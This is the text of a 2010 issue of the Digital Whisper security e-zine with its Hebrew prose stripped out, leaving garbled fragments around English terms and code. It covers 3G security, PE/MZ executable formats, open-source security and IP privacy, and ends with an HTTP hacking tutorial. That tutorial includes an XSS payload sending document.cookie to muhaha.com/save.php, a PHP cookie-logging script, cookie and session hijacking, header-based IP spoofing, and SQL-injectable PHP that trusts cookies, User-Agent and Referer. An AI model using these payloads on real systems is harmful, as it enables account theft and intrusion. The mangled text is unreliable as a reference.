Digital Whisper 8

Digital Whisper
,8 2010
:
:
, Ratinho ,
, , ," , ()Hyp3rInj3cT10n
Digital Whisper . Digital Whisper

. Digital Whisper/
. .
, , editor@digitalwhisper.co.il

www.DigitalWhisper.co.il
,8 2010

, , Digital Whisper .
, ,
/ .
.
( Digital Whisper )...
. ,
- ? ):
, -
!
( !)
. .
,
. " ( !)
( )Hyp3rInj3cT10n
.HTTP-
,
( )
.
!

,8 2010
3G MOBILE NETWORK SECURITY
11
23
26
PLAYING WITH HTTP
30
67

,8 2010
3G Mobile Network Security

()AGNil

. , (
) , . ,
. , -
-SMS . Apple
iPhone- , . ,
15,000 , .,
, .
, Google . " "Phone,Google-
,iPhone- .Google
, .
" : - ,
"!?Google . . ,Android
, ,
. , ,
, NEXUS1 ,HTC .Google
, ,
, .

,8 2010
. ,
, , .

? ?
? ?
, ( ) ,
" " . , ,
..

,
" " . " "
, ,
.
, ,
. :
" .1 " .70 -
, .
, .10Kbps-
" .2 " .90-
,CDMA ,GSM :.TDMA-
" " DATA - ,"
.200 Kbps
" .3 " ,
.1Mbps - , " "
, GSM .Wireless 3g GSM
WCDMA ,HSPA- CDMA .CDMA2000
" .4 " .2015
, ,wireless , .
IP
( , ," , messaging ,') .

,8 2010
?
:GSM
:
.1 - , ,PDA , .
( Base station System .2 )
.
- )BSC) Base Station Controller " -" ,
. , .
- Network Switching Subsystem .3 -
. , -
( PSTN ) , .
MMS ,SMS ,WAP .
-(MSC) Mobile Switching Center ,SMS , ,
' . , ,
.
-HLR GSM -
. SIM-
, .
,8 2010
VLR "" .
VLR , VLR .
, , '.
, . ,
. Google ...
:
- .
,Voice , ISP
. , ,
.
:
()http://www.iGR-inc.com :
ISP :
.1 , ,
.Denial of Service
SMS .
.2 ,
Blue-Tooth.
MMS .
,8 2010
,SPAM .3 , , ,
.
""
,IP- .
:
-
. , ,",MMS ,
.
( BS-Base Station -
) - ,
, .
DATA , .

. :

,8 2010
Serving SGSN-
.GPRS Support Node SGSN- )GPRS Tunneling Protocol( GTP
.GGSN- ,GGSN- .
GTP - ,
, , ,
"" . SGSN - ,GGSN -
GGSN- , , GGSN-.
( ,HLR ')
. ,SIP
( Voice Over IP VoIP) . Buffer
.Overflow
:
. ?
.1 , , .
, .
,ISP .
.2 -
-
. .
Firewall - . ,
, , .
Firewall .3 :
-Packet - Header-
.
-Session ,
.Session- ,"statefull inspection" : .
-Application
,L7- .
Firewall
. IDP ,
,DoS .

,8 2010
VPN .4 () GTP .
" .IPSec VPN , -
GGSN , ,"" .
?
. , ,
. ,
, , . ,
, , - -
.

.

, .
.
, .
.

,8 2010
10
.C++-
, - "" ( -)compilation
. cpp ,obj
Object Files . (Windows-
,)PE ()"symbols"-
. , ,

. :symbols
)1 ,
.
)2 ( ).
)3 .
, ( obj -) ,
.Linker ,
. Symbol , .
:

a.cpp
a.obj
b.cpp
p.exe

b.obj
obj .lib lib

.
. , obj - ( print ,)call

,8 2010
11
print ,
obj- . print
, print-
print . print ,
:
")error LNK2019: unresolved external symbol "void __cdecl hello(void
(?hello@@YAXXZ) referenced in function _main
)( hello .
,
.
.unresolved external symbol
, .
. symbols -
( )labels . Visual Studio-
","Assembler Output
Output Files . .
.

Windows- ,
. DOS ,
.COM .
: 16- 32-.
DOS ,
: 16 16 ,
16 .
16 ,
. ,
. ,
-
.
. 16 16
.
.
Windows ,
32 .
, multi tasking- .

. ,

,8 2010
12
,
. .
, 4GB
. .
,
. x86
. ,
.
x86
, .
.
.80686
,real mode -8086 ,1mb 16.

-80186 .
,protected mode -80286 ,16mb ,
.Windows 3.1
-80386 32 , ,4GB ,
.Windows NT
-80486 " "pipelining , .8K
-80686 .

, , ( Code
)Segment ( )Data Segment
. , .
, ( .)Stack
.
. ,C++-
, . ,
.
Low address
Code segment
Data segment
( Stack (Advancing up
High address

,8 2010
13
DOS
,DOS 16 + 16 ,
32 . : 20
16 ( .)MSB- :
,0xFFA4 ,0xFFA40 :
. 0x00BA : 0xFFAFA : 20.
, ,1K- ...
.
SS,CS :.DS-
-SS .
-CS .
-DS .
, -
.DS , .CS
push pop- SS - stack pointer-
.
DOS-
DOS
,PSP PSP- 0x100 : 256 : , .
81h : PSP- .80h
DS- PSP- .DOS DOS
.DS - CS
@data ,DS .
COM
, .
.
.
. ,
. , ,64K
.
PSP- ,0x100 : ,)instruction pointer( IP-
, ,0x100 : .
ORG 100h .100h
SS , 0xFFFF - 64K - .COM -
,COM ,
64K .

,8 2010
14
MZ EXE( DOS(
.
.)DS( DATA - IP .CS :
MZ .
. HEADER- 512 byte
" "header page .200h .
:MZ

- Code Segment
- Data Segment
, PSP-
. ,
" " .
MZ DOS:
()HEX
00-01
02-03
04-05
( 06-07)
08-09
14-15
( 18-19)
( 0E-0F)
( 10-11)
3C-3D
magic number MZ
( + ) . 0
512KB

,
.
IP . .

SS , DATA-
SP ,SS
PE ( ) . DOS
.0-
: 512KB Block( .16B Paragraph-)

=HEADER
DS :DOS ES- .PSP- SS- SP- "
. SS=CS , SP- 0xFFFF-
.

,8 2010
15

4 ( 2 = word) offset- -
.segment ( dynamic loader - )
. mov ax,@data 1B8 01 00- data segment-
0001 .
.01 00 00 00 ,0000:0001 B8
.01 00 dynamic linker-
, PSP- +
.PSP
Windows
FLAT MODEL32 bit
32bit flat model - ,
, 0:32 .offset paging
virtual memory- page .4KB page- .
12 20 .page .page-
1048576 ( .)pages 0- .
4GB . ( )2GB -
. 2GB- .

. .
) (DLLWindoes API-
Windows API- :
KERNEL32
USER32
GDI32
.DLL Windows NT 2GB
, . -
Windows NT DLL () .
, ,
.
B8 XX XX .mov ax,XXXX XXXX (.)immediate value

,8 2010
16
,
, page
. ,
.
:DLL
DLL - -lib
. user32.dll - , linker -
user32.lib external symbols- .DLL-
EXE WINDOWS PE/coff
,DOS - ()sections
Windows NT- .
+ DOS DOS .DOS stub
" ,"PE PE PE ( ,)optional ,
.
:
DOS
stub
+ MZ
( DOS )DOS stub
.
PE
)section headers( -
()sections
RVA :
Relative Virtual Address Image- . Image-
.Image Base

, .text
.
.text
.rdata
.data
.idata
.edata

read only data
( )
Import table DLL
Export table ( DLL )DLL

,8 2010
17
PE-
()HEX
117 - 114
11F - 11C
Address Of Entry
Point
Base Of Code
123 - 120
Base Of Data
127 - 124
Image Base
Image

Image

Image
,
Image
()Section Headers
, :
Virtual Address
Pointer To Raw Data
Characteristics
Image

. , ""
Section is executable | Section is readable
((Sections
)1000H( 4KB , Header- .
4KB- page .virtual memory-
PE
PE (.)header

PE - "( Base Address ") , , :
.40 00 00 00H . .
,
. )4 00H( 1024.

,8 2010
18

.call
( )jump .
.ret , .
;
.
" " ( .)function frame
, ebp .
(.)Old ebp
:
()http://www.codeproject.com/KB/tips/stackdumper.aspx :
call ( Arg1-
.)Arg0 :
7
4
func
esp, 8
push
push
call
add
func ,int 7 : 4- .
, add
. esp : 8( 8
,)int .

,8 2010
19
( ).
:
ebp
ebp, esp
push
mov
ebp
0
pop
ret
:ebp
- ebp .
esp .
[ebp-4] :.
.[ebp+4] :
.[ebp+4+i*4] :
, cdecl .
.

:

cdecl

stdcall

fastcall
ECX EDX
this ECX-
Thiscall
. GCC -
cdecl this-
.

Pascal
EAZ,ECX,EDX .
Borland
delphi/register .
"
()caller
()calee
( .)calee

-
.
()caller

,8 2010
20

.
( MASAM32 ,)http://www.masm32.com/masmdl.htm :
.
:COM
"ml /c /I"C:\masm32\include" "dostest.asm
"link16 /TINY "dostest.obj
dostest.asm .
C:\masm32\include ( . .h- ,)C++
.
.lib
MZ :DOS
"ml /c /I"C:\masm32\include" "dostest.asm
"link16 "dostest.obj
:PE
"ml /c /coff /Cp /I"C:\masm32\include" "test1.asm
"link /SUBSYSTEM:CONSOLE /RELEASE "/LIBPATH:E:\masm32\lib" "test1.obj
""/OUT:test1.exe
link ,ml link16- .C:\masm32\bin
DOS
Windows . ,
( ,
) Windows , DOS .VM
,DOS BOX- .
- MODEL
MODEL ,
:
]MODEL [TYPE
] [TYPE ," :
small
Tiny
flat
DOS .64Kb
,COM .
32 WINDOWS.

,8 2010
21

, .
" ,"The Art of Assembly Language:
http://www.arl.wustl.edu/~lockwood/class/cs306/books/artofasm/toc.html
:MSDN-
http://msdn.microsoft.com/en-us/magazine/cc301805.aspx o
http://msdn.microsoft.com/en-us/library/ms809762.aspx o
o
:CodeProject-
http://www.codeproject.com/KB/tips/stackdumper.aspx o
http://www.codeproject.com/KB/system/inject2exe.aspx o
:MZ
http://faydoc.tripod.com/formats/exe-DOS.htm o
http://davmac.org/davpage/doswin/dosexec.htm o
.
.
16- 32-
. , ,
. , ,
.
, .

,8 2010
22
?

, ,
. ,
,
. .
:
http://www.oriidan.info/article/thoughts
( ) , .
, ,
. ,
, . -
( . , ""
.
. - - ,
).
,
, .
, .
,
, ,
. .
,
, -
. , , ,
. :theregister-
http://www.theregister.co.uk/2004/10/22/security_report_windows_vs_linux
,
. :
?
,8 2010
23
. 16 , ,
, .

.
- , ( , , )
.
. , " "Windows
90% , ?
, .
, ,
,iPhone ,
BSD- . ,
.
?
, . , ,NetCraft
,
.FreeBSD , ' -
. .
,
, - .
, .
- ' , ,
. ,' .
" : " .
, , .
? ,
. , ,
- ! ,
( ) ( ).
, ,
, .
- .
Windows- " (
?
,8 2010
24
) , .
, .
, ,
.
,
.
, , .

, .
,
, ' . ,
.
,
.
.
, (".)"security by obscurity
, , ,
"" ,
.
-
, . ,
, .
,
, ,
...
.
? ,
, ,
.

. .
. ,
.
?
,8 2010
25

"
,
.
, , .
, "
.
, , ' ,
.
, , ,
. ,
, ;
, ( ,)Credentials ,
, ( OAuth ,OpenID
) . ?
,
, Bootstrapping . X X
, . ,
,Hotmail , , ,
; ,
, . ,
. , ;
, :
, ,
( ) . ,
Captcha .
, , , .
IP- , , . , ,
, , , :

( , ) .
: , ,

,8 2010
26
. . ,
, .
, :
, , .
; ,
IP- . ,IP ,
, (
) , . IP-
.
. 2005
IP . , -
, .
IP- ,
(" 4995/05
' ') . ,
; , , "" "-" ("
1238/07 ' ," 1752/06 ' ," 850/06 '
) , , Ynet-
(" 541/07 ' ) ,
(" (") 250/08 " '
") ,
( ( 2433/07 ")
` ") ,
( 1244/07 ' )
(" 11646/08 ' ) . ,
, . (
' ," ,)2008 .
75 ,
.
" " .IP
, ' ,
, ,
. " ' ,
( ,) , .
, ' , ,
-- , .

,8 2010
27
:

, .
, ,
,
( , , ) .
,
,
, .
- , , (
) , ,
.
.
, ,Proxy
.IP ,
,
IP ,
( 1806/09 ' ).
, , ,
.
(" 4447/07 ' )
.' , ,
:
" , ,
-
. -
.
,
".
.
, ,
.
,IP

.

,8 2010
28
,
, ,
, .
,
.
, , ( ,
) ,
.
. ,
, ,
Streaming .
, : IP- ,
,
; .
?2006-
? . , 2006-
. , ,2007
IP ,
IMEI ESN ,
. ,
.
, , .
, . ,

. ,
, . ,
, ,
.
, .

,8 2010
29
Playing With HTTP

()Hyp3rInj3cT10n
, , ,
- .
, , , .
, - .
HTTP
:
.1 ( )HTTP Request.
.2 , ( PHP, ASP, ASP.NET.)...
.3 ( HTML, CSS, JS.)...
.4 ( )HTTP Response .
.5 ( ) , .
?
( ).
.Firefox .
:PHP ,
!
, .
Playing With HTTP

,8 2010
30
()HTTP Requests

:
][Request Method] [Destination File] [HTTP Version
][Headers
][Content
- Request Method
HTTP , ( ):
- GET : , .
- POST ( , , .)...
- HEAD GET- , .
- OPTIONS .
- TRACE ,debugging- ( XST ).
- CONNECT .
- Destination File
:
http://www.roy.com/index.php?page=register&section=terms-of-use
, ( ,
):
/index.php?page=register&section=terms-of-use
- HTTP Version
:
]HTTP/[Version
:
HTTP/1.0
, :
HTTP/1.1
)(Hyp3rInj3cT10n
,8 2010
31
- Headers ()
.
:
][Name]: [Value
][Name]: [Value
][Name]: [Value
][Name]: [Value
(.)CRLF
= *( : )
* :Host ( Host- )IP

:Connection : ( )close ( .)keep-alive
, .
:Keep-Alive .
:User-Agent ( . ,useragentstring-
)
Accept ( :)Accept, Accept-Language, Accept-Charset, Accept-Encoding
.
:Referer . , .
:Cookie .
:Content-Type ,POST .
:Content-Length Content-.
, Cache - ,
. :
http://en.wikipedia.org/wiki/List_of_HTTP_headers#Requests
)(Hyp3rInj3cT10n
,8 2010
32
- Content
( ,)POST
. ,:
][Headers

][Content
()HTTP Responses

, , , .
. ( ) ,
. ,:
][HTTP Version] [Response Id] [Response Name
][Headers
][Content
HTTP Version , .
HTTP Version- , Headers- Content- , .
Response IdResponse Name-
, (
) . ( )Response Id ()Response Name
. :
- OK, 200 .
- Moved Permanently ,301 .
- Not Modified ,304 ( Cache-
).
- Bad Request ,400 ( ).
- Unauthorized ,401 .
- Forbidden ,403 .
- Not Found ,404 .
- Method Not Allowed ,405 ( )Request Method .
- Internal Server Error ,500 .
- Not Implemented ,501 .
- Service Unavailable ,503 .
)(Hyp3rInj3cT10n
,8 2010
33
- Headers
, .
:
:Date .
:Server ( , , ') ,
.
HTTP Fingerprints ( cp77fk4r .)DigitalWhisper
,
.
:Last-Modified .
:Content-Length Content-.
:Connection .
:Content-Type Content-.
:Location ( . .)30x
HTTP Response Splitting.Open Redirection-
. :
http://en.wikipedia.org/wiki/List_of_HTTP_headers#Responses
- Content
, .
.
( ...HTML, CSS, JS- )
. Content-
,Length .
: HEAD ,Content -
Content-.

( )Web Browser
. Ineternet Explorer ,
.Windows ,
. , ,
, , , :
)(Hyp3rInj3cT10n
,8 2010
34
- Mozilla Firefox , .Mozilla ,

.
- Google Chrome . .
Safari ,Apple ):
Firefox
, .
, .
,
:
HeaderMonitor
Modify Headers
Header Spy
HeaderControl
HTTP Resource Test
HeaderGetter
OpenHeader
.
Live HTTP Headers
.
, , ,
. ,
.
, Firefox "" "."Live HTTP Headers
, . , .
" "Reply .
" "Save All
" ."Reply ,
. .
:
https://addons.mozilla.org/he/firefox/addon/3829
)(Hyp3rInj3cT10n
,8 2010
35
Tamper Data
, .,
( )Abort .
. .
- . .
.
- "Tamper Data" - ."Live HTTP Headers" -
Start Tamper . .
Tamper Data
. ,
.Tamper Data- .
, :
https://addons.mozilla.org/he/firefox/addon/966

GET/HEAD-
: GET .
HEAD GET- , (.)Headers
http://php.net :
GET / HTTP/1.1
Host: php.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.1.7) Gecko/20091221
Firefox/3.5.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: he,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
:
HTTP/1.x 200 OK
Date: Mon, 12 Oct 2009 17:27:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9RC3-dev
X-Powered-By: PHP/5.2.9RC3-dev
)(Hyp3rInj3cT10n
,8 2010
36
Last-Modified: Mon, 12 Oct 2009 18:50:22 GMT

Content-Language: en
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=utf-8
HTML, CSS, JS....
" " ,
.
.) ( Content- HEAD-
POST-
( Forms / POST :
.)
:php.net echo
POST /search.php HTTP/1.1
Host: www.php.net
Firefox/3.5.7
Keep-Alive: 300
Referer: http://php.net/
Cookie: COUNTRY=ISR%2C ;LAST_LANG=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
pattern=echo&show=quickref&x=0&y=0
:
HTTP/1.x 302 Found
Date: Mon, 12 Oct 2009 17:28:58 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9RC3-dev
X-Powered-By: PHP/5.2.9RC3-dev
Content-Language: en
(Hyp3rInj3cT10n)
37
2010 ,8
X-PHP-Load: 0.8916015625, 0.9599609375, 0.97265625

&Location: http://il2.php.net/search.php?show=quickref&pattern=echo
Connection: close
Content-Type: text/html; charset=utf-8
HTML, CSS, JS' ,
. " "
.
OPTIONS-
OPTIONS :
OPTIONS /index.html HTTP/1.1
Host: 127.0.0.1
:
HTTP/1.1 200 OK
Date: Thu, 25 Mar 2010 13:43:04 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4
Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Content-Type: text/plain
:
.
,
(
) . , 501
.Not Implemented
:
HTTP/1.1 405 Method Not Allowed
Date: Fri, 02 Apr 2010 11:42:20 GMT
)Server: Apache/2.2.11 (Win32
)(Hyp3rInj3cT10n
,8 2010
38
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /index.html.</p>
</body></html>
,PUT ,
.
TRACE-
! Debug TRACE :
: TRACE
TRACE /index.html HTTP/1.1
Host: 127.0.0.1
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:41:20 GMT
Server: Apache/2.2.11 (Win32)
Content-Type: message/http
Host: 127.0.0.1
. Content- ,
:
Host: 127.0.0.1
User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2)
Gecko/
20100316 Firefox/3.6.2
(Hyp3rInj3cT10n)
39
2010 ,8
:
HTTP/1.1 200 OK
Date: Fri, 02 Apr 2010 11:50:03 GMT
Host: 127.0.0.1
)User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2
Gecko/
20100316 Firefox/3.6.2
PHP-
, .
,PHP .
file_get_contents
:
<?php
;)'echo file_get_contents('http://www.google.co.il/search?q=Hyp3rInj3ct10n
>?
GET , (
).
.
http://il.php.net/file_get_contents :
,
( )//:http .
)(Hyp3rInj3cT10n
,8 2010
40
fsockopen-
.PHP fsockopen-
:GET
<?php
$socket = fsockopen('127.0.0.1',80);
if ( $socket )
{
$data = "GET /index.php?page=news HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n\r\n";
fwrite($socket,$data);
while (!feof($socket))
echo fgets($socket,128);
fclose($socket);
}
?>
. :
) .GET- ( :HEAD
<?php
if ( $socket ){
$data = "HEAD /index.php?page=news HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n\r\n";
fclose($socket);
}
?>
) ( :POST
<?php
(Hyp3rInj3cT10n)
41
2010 ,8
if ( $socket ){
$data = "POST /post.php HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.2.2)
Gecko/20100316 Firefox/3.6.2\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: he,en-us;q=0.7,en;q=0.3\r\n";
$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Keep-Alive: 115\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Referer: http://localhost/post.php\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: 19\r\n\r\n";
$data .= "nick=Hyp3rInj3cT10n";
fclose($socket);
}
?>
. OPTIONS TRACE ,
:
:TRACE
<?php
if ( $socket )
{
$data = "TRACE /index.html HTTP/1.1\r\n";
$data .= "Host: 127.0.0.1\r\n\r\n";
fclose($socket);
(Hyp3rInj3cT10n)
42
2010 ,8
}
>?
:OPTIONS
<?php
;)$socket = fsockopen('127.0.0.1',80
) if ( $socket
{
;"$data = "OPTIONS /index.html HTTP/1.1\r\n
;"$data .= "Host: 127.0.0.1\r\n\r\n
;)fwrite($socket,$data
))while (!feof($socket
;)echo fgets($socket,128
;)fclose($socket
}
>?
,
,
. .
. , ,
.
? ,
. ,
.
( POST ) .
:
POST /login.php HTTP/1.1
Host: 127.0.0.1
Firefox/3.6.2
)(Hyp3rInj3cT10n
,8 2010
43
Keep-Alive: 115
Referer: http://localhost/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
username=Hyp3rInj3cT10n&password=45h6ff2&send=Login
:
HTTP/1.1 200 OK
Date: Fri, 26 Mar 2010 14:03:21 GMT
Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: id=1538; expires=Sat, 20-Apr-2013 12:13:12 GMT
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

.1538 id
.
:
GET /index.php HTTP/1.1
Host: localhost
Firefox/3.6.2
Keep-Alive: 115
(Hyp3rInj3cT10n)
44
2010 ,8
Cookie: id=1538
.
.
? : . id- .1538 :
, ,?
...
Host: localhost
Firefox/3.6.2
Keep-Alive: 115
Cookie: id=1
" , 1538 - ,1-
.
. ,
! Cookie Modification .Cookie Manipulation
: .
, .
, :
. ,
: ,
. ,
. .
( : )
HTTP/1.1 200 OK
Date: Fri, 26 Mar 2010 14:24:56 GMT
Perl/v5.10.1
)(Hyp3rInj3cT10n
,8 2010
45
X-Powered-By: PHP/5.3.1
Set-Cookie: ban=1; expires=Sat, 20-Apr-2013 12:13:12 GMT
Content-Length: 0

, ...

( ) ,
. , , 2
.

,
. . .

( - )Brute Force . ,
. :
.
Brute Force - ,
( .)...IP, User-Agent ,
( )...MD5, SHA1 Brute-Force ,
, .
( ,)POST
.

( Cookies Stealing )Cookies Grabbing .
Cross Site Scripting, Cross Site Tracing :...
.
. , ,
.
?
, ,
. , , .
)(Hyp3rInj3cT10n
,8 2010
46
Cross Site Scripting

, Javascript - .
:
><script>location.replace("http://muhaha.com/save.php?c="+document.cookie);</script
( )Redirection ( ) .
. :
http://muhaha.com/save.php?c=Cookies
,Cookies .
(.)save.php save.php :
<?php
) )]'if ( isset($_GET['c']) && is_string($_GET['c']) && !empty($_GET['c
{
;)'$handle = @fopen('list.txt','a
) if ( $handle
{
= @fwrite($handle,"\r\n\r\n".$_GET['c']); // \r\n
;)@fclose($handle
}
;)"header("Location: http://the-site-the-surfer-came-from.com/index-file.html
}
>?
:
, .
.
,
.
list.txt ,
, htaccess -
( .)wwwroot / public_html-
)(Hyp3rInj3cT10n
,8 2010
47
Sessions-
, . ?
:Session . Session .
Session Identifier
. ,PHP- .PHPSESSID
. ,Sessions- :
( Session Hijacking )Session-
( PHPSESSID ) , .
, .Session
Session Hijacking : Session
IP - Session User-Agent .
Session- , .
:
<?php
;)(session_start
) )if ( count($_SESSION
{
;)]'$valid = md5($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT
) )]'if ( isset($_SESSION['valid
{
) if ( $_SESSION['valid'] != $valid
{
;)(session_unset
;)(session_destroy
;)(session_regenerate_id
}
}
else
{
;$_SESSION['valid'] = $valid
}
}
//
)(Hyp3rInj3cT10n
,8 2010
48
Sessions-
Sessions - , ,
. Sessions- (
).
( Session Fixation )Session-
PHPSESSID , .
( )POST (.)GET
:
http://www.site.com/index.php?page=login&PHPSESSID=h2dsamokpimsfp11v2nh9e6
mc7
? :
:
http://www.site.com/index.php?page=index&PHPSESSID=h2dsamokpimsfp11v2nh9e6
mc7
Session , Session- :
h2dsamokpimsfp11v2nh9e6mc7
( )
:
http://www.site.com/index.php?page=login&PHPSESSID=h2dsamokpimsfp11v2nh9e6m
c7
.Session- ,
.Session-
Session - .h2dsamokpimsfp11v2nh9e6mc7 :
Session - , -
Session .
: .
,Session Hijacking
. ,php.ini- ,PHP- :
session.use_cookies = 1
session.use_only_cookies = 1
)(Hyp3rInj3cT10n
,8 2010
49
?
Sessions .
. ,
.
Session-
: PHP -
( )Full Path Disclosure" ,PHPSESSID -
Session-.
( : )
Host: localhost
Firefox/3.6.2
Keep-Alive: 115
Cookie: PHPSESSID=.
:
Cookie: PHPSESSID=.
Session- , .
PHP- :
Warning: session_start() [function.session-start]: The session id contains illegal
'characters, valid characters are a-z, A-Z, 0-9 and '-,
in/home/roy/domains/roydomain.com/public_html/folder/file.php on line 2
? , !
?
:
roy
)(Hyp3rInj3cT10n
,8 2010
50
:
folder/file.php
:
/home/roy/domains/roydomain.com/public_html/
, .

User-Agent
?User-Agent User-Agent :
User-Agent: Mozilla/5.0 (Windows; U; Windows NT
5.1; he; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
, .:
( )5.0
(=N =U , =I , )
Windows XP
()hebrew
Gecko 1.9.2.2 16.03.2010
Firefox 3.6.2
( IP- ) Referer-
( ) . , ? ,
, ?
" , "...
, " : , ."...
,? , ( :
) . ? IP - ,
. , User-Agent :
)User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http//www.google.com/bot.html
.. ! User-Agent
,Faking?
)(Hyp3rInj3cT10n
,8 2010
51

, ,
.
..
? ?
. Referer . , ( ,
) ...
Referer: http://this-site-address.com/index.php
- . Referer Faking
.

, .Internet Explorer
,
" , .
? :
.User-Agent :
,
. , User-Agent
MSIE ,Microsoft Internet Explorer
.MSIE , ...
.
, ,MSIE :
User-Agent: MSIE
, ! ( User-Agent Faking User-
.)Agent Modification

,
. ,
, .
:
)(Hyp3rInj3cT10n
,8 2010
52
><input type="text" ... value="" maxlength="10" /

( )HTML- 10
. ( ),
. ? :
.1 .JavaScript Injection- ( )
: PHP
.DigitalWhisper ( -
)DigitalWhisper : , .
.2 .Form Manipulation- .
.3 .Firefox .Web Developer- .
JavaScript-
( )counter ,Javascript- ,
. , . ,
, .
. . ,
Javascript - , .
? Javascript Injection, Form Manipulation . ...
,
.
cp77fk4r ( TryThis0ne ,
) . :
http://trythis0ne.com/levels/web-challanges/MSD/index.php
?
. ,
... ? ):
,Javascript
. , ,
.
)(Hyp3rInj3cT10n
,8 2010
53
:
- :
4 . , , .
Javascript Injection -
, ( , ) :
;)javascript:void(count1=0,count2=0,count3=0,count4=0
( ,Javascript Injection [ ]
)
- :
, , :
;)(document.a.submit
, . ,( :
)
;)(javascript:document.a.submit
- :
? :
;)setTimeout('countdown()',1000
countdown ( 1000 = ).
, - .
, , ( ,)setInterval
.:
;))javascript:void(setInterval('countdown()',1
( ) countdown ,
. ,
, ( ) .
, .
,
, .

.
. , IP
(
)(Hyp3rInj3cT10n
,8 2010
54
) : .
, :
" "he " ,"hebrew - Hebrew : , .
. User-Agent Modification
.:
5.1; en; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
en ,english - English : , ,
.

. ,
.
(
" X ").
, ,? , .
? :
. ,disabled ( )true .
, ( ,)false -
,Javascript . ?
Javascript Injection, Form Manipulation : .
JavaScript-
"- " ,
, JavaScript - ( navigator
).
Request- ,
. ,Firefox -
. ,Coral IE Tab
.
, ,Internet Explorer - .Mozilla Firefox
. ,User-Agent Switcher
User-Agent navigator
. .
)(Hyp3rInj3cT10n
,8 2010
55
IP- ( )
IP-
. , IP-
. , , .
IP- , .
? Proxy , IP
. ?
IP IP -
:
) ).. if ( isset($_SERVER['HTTP_CLIENT_IP']) && preg_match(..
{
;]'$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_CLIENT_IP
}
,Client-IP ( IP - )
.
( )Header ,
. , :
Client-IP: 209.85.135.99
IP- IP- . ,
IP- IP- ... .
Invision Power Board- .
IP- ( Client-IP ).
,( .IP address spoofing in e107 : X-
.)Forwarded-For
IP - . .
IP- :
Client-IP: 000.00.000.00
, :
Client-IP: 127.0.0.1
IP - .localhost - ,
.
)(Hyp3rInj3cT10n
,8 2010
56
Client-IP .
,Proxy-User .
:
) )if ( isset($_SERVER['HTTP_PROXY_USER']) && preg_match(...
{
;]'$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PROXY_USER
}
( : IP )
Proxy-User: 000.00.000.00
,:
) )]'if ( isset($_SERVER['HTTP_PROXY_USER
{
;]'$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PROXY_USER
}
,IP
:
Proxy-User:
, IP - ,
.
, :
Client-IP
X-Forwarded-For
Proxy-User
Forwarded
Useragent-Via
Proxy-Connection
Xproxy-Connection
Pc-Remote-Addr
Via
, , ):
)(Hyp3rInj3cT10n
,8 2010
57

GET- , ."
. ( User-Agent, Referer : Cookie- ,)Sessions-
.
? ? ,
:
,
.
Session Injection
Session-
,
:
<?php
;)'mysql_connect('host','username','password
;)'mysql_select_db('database
;]'$sessionId = $_COOKIE['PHPSESSID
$query = mysql_query("SELECT username,email,points,settings FROM members
;)"'}WHERE last_session_id='{$sessioId
;)$rows = mysql_num_rows($query
) if ( $rows > 0
{
;)$memberInfo = mysql_fetch_array($query
}
;)(mysql_close
>?
PHPSESSID Session Identifier -,
Session - . , SQL
.Injection
User-Agent Injection
,User-Agent ).
)(Hyp3rInj3cT10n
,8 2010
58
( User-Agent ,
:)
<?php
mysql_connect('host','username','password');
mysql_select_db('database');
$ua = $_SERVER['HTTP_USER_AGENT'];
$query = mysql_query("SELECT ua FROM ua WHERE ua='{$ua}'");
if ( mysql_num_rows($query) == 0 )
mysql_query("INSERT INTO ua VALUES('{$ua}')");
mysql_close();
?>
User-Agent . User-Agent
. SQL Injection
Referer Injection
: .
<?php
mysql_connect('host','username','password');
mysql_select_db('database');
$referer = $_SERVER['HTTP_REFERER'];
$query = mysql_query("SELECT url FROM referers WHERE url='{$referer}'");
if ( mysql_num_rows($query) == 0 )
mysql_query("INSERT INTO referers VALUES('{$referer}')");
mysql_close();
?>
,User-Agent Injection ,
.User-Agent ) Referer( .
Cookie Injection
, . ,
:
(Hyp3rInj3cT10n)
59
2010 ,8
) )]'if ( isset($_COOKIE['user-id
{
